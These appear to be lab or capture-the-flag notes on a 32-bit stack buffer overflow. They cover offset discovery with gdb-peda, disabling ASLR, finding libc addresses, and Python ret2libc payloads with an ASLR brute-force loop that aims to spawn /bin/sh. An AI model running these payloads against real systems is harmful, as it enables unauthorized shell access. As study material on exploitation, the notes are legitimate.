Buffer Overflow

Test Overflow

./binary `python -c 'print "A"*500'`

Open binary with gdb

First install Python Exploit Development Assistance for GDB.

git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit
gdb ./binary
gdb# b main
gdb# r

Identify if host has ASLR

ASLR - when the address for libc keeps changing.

ldd binary | grep libc (run multiple times and check if address changes)

Disable ASLR

echo 0 > /proc/sys/kernel/randomize_va_space

Create patterns

Create a pattern tht never repeats/ unique string.

locate pattern_
pattern_create.rb -l 200

Pass argument to binary

gdb ./binary
gdb# r '$PATTERN'

Copy memory addres of the crash

pattern_offset.rb -q 0x64413764   #(Address)
Found match at offset 112

Start buffer overflow script

import struct

buf = "A" * 112
buf += struct.pack("<I",0xd3adc0d3)

print buf
gdb ./binary
gdb# r 'python buff.py'

Find important addresses

On Victim machine

ldd ovrfl | grep libc #returns the libc address and location
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -i system # get system@@GLIBC offset address
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -i exit # get exit@@GLIBC offset address
strings -atx /lib/i386-linux-gnu/libc.so.6 | grep bin/sh # get bin/sh string offset address

Or using gdb in similar VM (ASLR is on)

#include <stdlib.h>
 void main() {
     system("/bin/sh");
 }
gcc retlib.c -o retlibc
gdb ./retlib
#gdb p system   #get system address
#gdb p exit   #get exit address
#gdb searchmem /bin/sh #get /bin/sh address
#gdb find 0xf7e0c980, +9999999, "/bin/sh"  #get /bin/sh address

Additions to script

import struct

system_addr = struct.pack("<I",0x88482f8)
exit_addr = struct.pack("<I",0xd3adc0d3)
arg_addr = struct.pack("<I",0x88482f8)

buf = "A" * 112
buf += system_addr
buf += exit_addr
buf += arg_addr

print buf
gdb# r 'python buff.py'

Bruteforce ASLR

On the actual host grab one of the libc addresses.

from subprocess import call
import struct

libc_base_addr = 0x88482f8

system_off = 0xd3adc0d3
exit_off = 0xd3adc0d3
arg_sh = 0xd3adc0d3

system_addr = struct.pack("<I",libc_base_addr + system_off)
exit_addr = struct.pack("<I", libc_base_addr + exit_off)
arg_addr = struct.pack("<I",libc_base_addr + arg_sh)

buf = "A" * 112
buf += system_addr
buf += exit_addr
buf += arg_addr

i=0
while (i < 512):
    print "Try: %s" %i
    i +=1
    ret = call(["/usr/local/bin/ovrflw",buf])

If ASLR is off the script will work without the loop and with the print at the end

./binary $(python /dev/shm/exploit.py)